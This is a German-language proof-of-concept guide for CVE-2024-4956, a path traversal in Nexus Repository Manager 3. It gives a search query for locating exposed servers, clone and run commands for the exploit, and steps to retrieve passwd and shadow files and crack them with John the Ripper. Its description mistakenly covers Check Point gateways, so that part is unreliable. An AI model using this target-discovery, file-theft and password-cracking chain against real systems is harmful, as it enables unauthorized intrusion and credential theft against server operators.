
POC - CVE-2024–4956 - Nexus Repository Manager 3 Nicht authentifizierte Pfad-Traversierung
Ermöglicht es einem Angreifer potenziell, bestimmte Informationen auf Check Point Security Gateways zu lesen, sobald diese mit dem Internet verbunden und mit Remote Access VPN oder Mobile Access Software Blades aktiviert sind. Ein Sicherheitsupdate, das diese Schwachstelle entschärft, ist verfügbar.
Mehr dazu lesen — CVE-2024-4956
Haftungsausschluss: Dieses Proof of Concept (POC) dient ausschließlich zu Bildungs- und ethischen Testzwecken. Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesrechtlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Programm verursacht werden.
Um potenzielle Ziele zu finden, verwende Fofa (ähnlich wie Shodan.io):
header="Server: Nexus/3.53.0-01 (OSS)"
Zuerst das Repository klonen:
git clone https://github.com/verylazytech/CVE-2024-4956
Als Nächstes wähle dein Ziel und füge es im folgenden Format zur Datei list.txt hinzu:
Führe den Exploit aus:
python3 CVE-2024-4956.py -l list.txt
Die Ausgabe sind die gefundenen passwd- und shadow-Dateien:

Nachdem du nun sowohl die Dateien passwd als auch shadow gefunden hast, kannst du versuchen, den Hash mit JohnTheRipper zu knacken. Nach dem Ausführen des Exploits hast du 2 Dateien, passwd und shadow. Du kannst sie also in einer Datei zusammenführen und versuchen, sie zu knacken (ich habe rockyou.txt verwendet, aber es kann jede Passwort-Wortliste sein):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt